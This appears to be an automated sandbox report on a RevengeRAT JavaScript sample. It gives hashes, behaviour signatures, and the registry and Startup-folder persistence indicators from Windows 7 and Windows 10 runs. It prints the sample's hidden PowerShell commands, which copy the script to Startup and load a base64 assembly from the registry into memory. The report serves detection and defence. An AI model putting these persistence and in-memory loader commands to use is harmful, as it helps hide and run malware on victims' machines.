Malware Analysis Report

2024-10-19 08:42

Sample ID 240319-28sytsah3t
Target d7520f1f5438e4e82c1234fbcb10c6dc
SHA256 1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a
Tags
revengerat office persistence stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a

Threat Level: Known bad

The file d7520f1f5438e4e82c1234fbcb10c6dc was found to be: Known bad.

Malicious Activity Summary

revengerat office persistence stealer trojan

RevengeRAT

RevengeRat Executable

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2024-03-19 23:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-19 23:15

Reported

2024-03-19 23:18

Platform

win7-20240221-en

Max time kernel

148s

Max time network

149s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

Signatures

RevengeRAT

trojan revengerat

RevengeRat Executable

stealer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Network

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f19d9ea6a6a0d49bf8b37f9575e94712
SHA1 789cd1284971429d4677f3694508c619703899ce
SHA256 a4bc1eb07371da6a6a59fbc8cfa947003825544823fd81baa17a7a288158083d
SHA512 592665aa84aecb432a1c8c4ebae6a25bdab0875cee1376e7485757477c2cf7e9ff5d6e52a4dcc3414cce62fd3ae30a764ffff93c55023ffc1a275f3b6aae186d

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-19 23:15

Reported

2024-03-19 23:18

Platform

win10v2004-20231215-en

Max time kernel

146s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

Signatures

RevengeRAT

trojan revengerat

RevengeRat Executable

stealer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5umq0dan.0mc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c